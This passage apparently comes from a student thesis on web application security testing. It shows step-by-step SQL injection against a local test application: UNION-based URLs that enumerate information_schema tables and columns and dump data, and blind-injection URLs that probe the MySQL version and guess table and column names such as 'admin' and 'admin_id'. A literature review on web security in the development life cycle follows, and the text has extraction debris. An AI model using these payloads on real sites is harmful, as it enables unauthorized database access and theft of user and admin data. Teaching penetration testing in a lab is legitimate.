Now suppose if the SQL version 5 we get then the above method will not work but we can use this method. For this we need database name which we already got by using database (). We can use this information_schema database to find its table names. To get tables we use tables_name and information_schema.column (Howard, LeBlanc&Viega, 2010).

(36)

37 Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,t

able_name,3+from+information_schema.tables--Here we replace the number 2 with tables_name to get the first table from information_schema.column displayed on the bellow screen.

Figure 11 Buy Cut save Application Database, Table and Column Emuneration

You can see from Figure 11, we got the name of the first table CHARACTER_SET which is in database Information_schema. We can add LIMIT to the end of query to list out all tables (Ringgold& Portland, 2012).

3.3.2.10 Enumerating Column

Now, we want to get column name of particular database. We will use column_name and information_schema.column functions to get that column name.

(37)

column_name,3+from+information_schema.columns--38 Here we replace the number 2 with column_name to get the first table from information_schema.column displayed on the bellow screen. We can add LIMIT to the end of query to list out all columns.

Figure 12 Buy Cut save Application Enumerating Column

We can see from example which is given in Figure 12 by using that column_name function we got the name of the column which is in information_schemadatabse.

3.3.2.11 Dumping Database

The database dumping process can start only after once we receive the information of column. The next task of penetration tester is to enumerate the information inside the column of the table. Database holds all the information such as password and users’ information. The penetration tester tries to dump the database information using these techniques (Howard, LeBlanc& Viega, 2010).

Now to check column names we can use the table name and the column name in the URL. Once we execute the URL as below defined we will receive the information which will exist in the defined column.

(38)

CHARACTER_SET_NAME,3+from+CHARACTER_SETS--39 So, like that we can use this MySQL URL method to through the sql injection attack and as we see in example of the web application BCS PREDICTION how we can get the all database information by using sql injection method.

Below is the snapshot of the database which dump by using MySQL in URL method,

Figure 13 Buy Cut save Application Dumping Database

We can see in the above database in Figure 13, I found the database name, table name, column name, and all information of the database by using MySQL URL method sql injection technique.

3.3.3 Sql Injection InMySqlBy Blind Injection Method:

Blind injection is a little more complicated then URL injection but it can be Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1

In this time when we use above URL the page will be load normally now let’s check it’s for vulnerable blind injection

(39)

40 3.3.3.1 Vulnerability Checking In Blind Sql Injection

Put 1=1 after the site. The page will be load normally because this condition will always true

 For example

http://localhost/bcs/admin/category_form.php?id=1%20AND%201=1

 Condition is true:

Figure 14 Buy Cut saves Application Blind SQL Injection Checking

The above Figure 14 explains about the blind injection vulnerability checking by passing the values in the URL. There is not any reflection we can find in the snap shot which is given in Figure 14 after passing the false values in the URL.

Now change 1=1 to 1=2 this is false now see what happen.

 For example

http://localhost/bcs/admin/category_form.php?id=1%20AND%201=2

So if some text, picture or some content is missing on returned page then that site is vulnerable to blind sql injection. We can see in below snap shot when condition is false “CATEGORY OF TYPE” became Category Title instead of “BEEF”.

(40)

41 Figure 15 Buy Cut save Application Blind SQL Injection Checking

Now as we can see in Figure 15, we find that the site is vulnerable of blind sql injection then Get the MySQL version to get the version in blind attack we use sub string. We use true and false condition with version function to check whether the version of your database is 5 or 4.

3.3.3.2 Getting Version in MySQL Database

In blind sql injection the database version get by substring function and @@version

 For example:

http://localhost/bcs/admin/category_form.php?id=1%20AND%20substring(@@version,1,1)= 5--+-%E2%80%99

This should return TRUE if the version of MySQL is 5. If the database has version 5, than this condition will be true. So the page will load normally.

(41)

42 Figure 16 Buy Cut save Application Getting Version in MySQL Database

In the Figure 16, I Replaced 5 with 4, if the database has version 5 than this condition will be false.

http://localhost/bcs/admin/category_form.php?id=1%20AND%20substring(@@version,1,1)= 4--+-%E2%80%99

As it identified in Figure 17, after passing the query, it will change some pictures or icons in the web page. We can see from below snap shot the Category of Title is changed.

(42)

43 3.3.3.3 Enumerating table name from the current database:

In Blind Injection we have to guess tables name with the condition. If the condition is true than page will load normally.

We will try with different table names as it’s given below in Figure 18, 19 and 20:

 (1) Passwords

http://localhost/bcs/admin/category_form.php?id=1%20AND%20%20(SELECT%201 %20from%20passwords%20limit%200,1)=1--+-

(We got an Error)

Figure 18 Buy Cut save Application Enumerating Name from Database

 (2) Users

http://localhost/bcs/admin/category_form.php?id=1%20AND%20%20(SELECT%201 %20from%20users%20limit%200,1)=1--+-

(43)

44 Figure 19 Buy Cut save Application Enumerating Name from Database

 (3) Admin

http://localhost/bcs/admin/category_form.php?id=1%20AND%20%20(SELECT%201 %20from%20admin%20limit%200,1)=1--+-

(Page will load normally, that means condition is true. Database has one table which name is “admin”.

Figure 20 Buy Cut save Application Enumerating Name from Database

3.3.3.4 Enumerating Column Name:

Now what we the same as table name, we start guessing. Like I said before try the common names for columns.

(44)

45

 (1) User id

 http://localhost/bcs/admin/category_form.php?id=1%20and%20(SELECT%20substri

ng(concat(1,userid),1,1)%20from%20admin%20limit%200,1)=1--+-If the page loads normally we know that column name is User id in Admin table (if we get false then try other common names or just guess). In below Figure 21, we can see we got an error that means there is no user id column in Admin table.

Figure 21 Buy Cut save Application Enumerating Column Name

 (2) Admin_id

 http://localhost/bcs/admin/category_form.php?id=1%20and%20(SELECT%20substri

(45)

ng(concat(1,admin_id),1,1)%20from%20admin%20limit%200,1)=1--+-46 Figure 22 Buy Cut save Application Enumerating Column Name

As we can find in Figure 22, the page will load normally that means there is a column which name is admin_id in admin table.Like this with the using of Blind SQl injection techniques we dump the database.

(46)

47 V. Literature review on web security practices

5.1 History of web application security fields and practice

Web Application introduced in 1990, the web was a general, delivery mechanism. It is transform from a for static hypertext documents to a complete dynamic run-time environment for multi-party and distributed applications. The web technologies have progressively transformed from a centralised server technology to an interaction models and dynamic client model. The emerging trend was popular in peer-to-peer web applications and multiple applications. But the transformation of the web application from the server-centric model creates a significant and numerous challenges in web applications security (Alanazi & Sarrab 2011). In the past decade it was not possible to make web application client centric. Thus it is work as motivation in the need for compact security of web application.

Figure 23 History of Web application Development till Hacking Arrives (Owasp.org.au, 2015)

As above Figure 23 explain about the development if the web server and the languages which took web applications in the world market. After the introduction of web server and browser, the continuous development is started. Hence it is a service of transformation, it security concerns starts with its progress. The year 1995, is the year of new achievements in the area of web development, lots of new things are discovered. In late, 1994 W3C introduced. PHP

First Web Server And Browser Intoduced W3C Php 1.0 & Apache Released, IIS 1.0 Releaed On Windows NT, Live (Java) Script, Mysql And IE1 Released OWASP Started, ASP.Net 1.0 Released, SQL Slammer Worm Started, Works Started On Html5 Samy Worm Released, AJAX Term Proposes, Web Vulnerability Scanner Introduced Web Application Hacking Arrives

Infi

nite

Cod

ing

Err

ors

Dev

elo

pm

ent

Issu

e

(47)

48 1.0 and Apache server was introduced in 1995 (Alanazi & Sarrab 2011). Microsoft releases their software for web development named IIS and also internet exploer 1 is introduced. There are some methodologies which are worked for the security of web application at initial level of the development.

Fine-grained access control: These are the policies which define how the application authentication process goes and application authorizes end users. In the beginning of web application, security is simple from which web application frameworks checked, and the simple sequences maintain the application’s integrity. There was a series of questions from foundation for authentication process and protocols limits to the feasibilities of authentication such as secure session management (Alanazi & Sarrab 2011).

Information-flow control: It specifies the security of sensitive data, trust domains, data integration, and client-side and server-side information processing. Initially in web development, organisation’s policies are the base for the security policy of a web application. Information-flow policies involved individuals with possibly certain goals. That time tracking end-to-end information and its flow in web applications could not be find out and is follow by end user review. Information-flow control policies are set of mechanisms practically implemented in a web setting.

Secure composition: In the starting, securities are applying in the code of web applications. In short, coding part solely responsible for the security of a web application. Traditional HTML fails to deliver both the interaction and security needs. Security is composition of interaction and separation.

Cross-domain interaction: The original and unresolved problems of the last decade in web development, is the inherent incompatibility. That is lies in cross-domain nature of the hyperlink. In the past, situation was even more complex. Now days, java script plays an important in securing the web application from its birth in web application development. This scripting language is formalizing its semantics. Now the HTML5 also come with lots of security features for various threats regarding to web application. (Desme and Johns, n.d.) 5.2 Web security design with software engineering

Most of the applications developed with the software engineering models that help in management of resources. Organisations are not fully aware about the fact of security issues which were not considered as a serious element in development life cycle.

(48)

49 The organisations manage security of application by separate processes to meet requirements. Meanwhile SDLC provides options for security of an application. The security service can be implementing with the phase of the development life cycle (Meier, 2006).

Figure 24 Security in SDLC Process (SANS Institute, 2007)

The given Figure 24 explains about the security in SDLC, which define the techniques to represent the secure software development process.

5.2.1 Security Requirements

To find out the requirements, first step is to classify the Application. At the application development beginning, the level of expected security for the software will be found out. Application is categorized on the basis of the application usage, sensitivity of data, and technology to be use and also application type i.e. web based or non-web based application. This will helps in set the level to be required for the application that is low, medium or high. (SANS Institute, 2007)

(49)

50 5.2.2 Secure Application Design and threat modelling

It is need to concern about web application security and the potential vulnerabilities which may mitigates the application if it is not designed in security measures. In an architectural level of web application, surface area of attacks must be measured. The design must be based on the assumptions and researched potential threats (Nahari, Krutz, & Books24x7, 2011). In the formal application security requirements and specification are combined. This activity of phase is called threat modelling. It helps in understanding of possible threats for the application. The threat modelling includes the application components definitions, segmentations of applications, and finds dependencies (internal and external). It is necessary to resolve the possible issues. At last of the phase, the finalise design is reviewed from security point of view. There are also some vulnerability techniques and modelling tools are used for threat analysis. Some of the common threats include loss of sensitive data, denial of the service, unauthorized access etc.

The common threats can be loss of confidential data, unauthorized access, denial of service attacks, etc. By identify all illegal actions that could be engaged to application, it is necessary to attack actions. This would help in diminishing the risks associated with the malicious system use. The reaction of risk activity can be eliminate the risk or reduces the risk and also receive the risk.

5.2.3 Develop with Secure Coding-

It is known thing that the probable security bugs lift in the application, mainly during development phase. During development phase, the security issues occurrence depends on the coding conventions, coding standard, choice of language, development environment, baselines for security, data handling methods, integration with external applications and implementation of security features. Coding standard needs to establish for your securing applications. There are many ways and techniques available for different technologies to write code with secure approach. These techniques required to be utilize to maintain security issues and coding errors.

Hence, the vital thing is that these practices are approached in the code for all the modules of applications thus bugs can be found in the early phase of development rather than the code set for distribution.

5.2.4 Application Security Testing-

The importance and cost has increased with completion of each phase of development life cycle model. Thus it is need to be making test strategy for every phase. Testing of each phase

Security Testing on Web Application. Prepared by: Tausif Aghariya S Supervisors: Krishnan Kannoorpatti, Sami Azam. School of Engineering and IT

Acknowledgement

Abstract

Table of Contents

List of Figures

List of Abbreviations

SQL Injection

Simple SQL

injection

Union SQL

Injection

Error Based

SQL Injection

Blind SQL

Injection

Infi

nite

Cod

ing

Err

ors

Dev

elo

pm

ent

Issu

e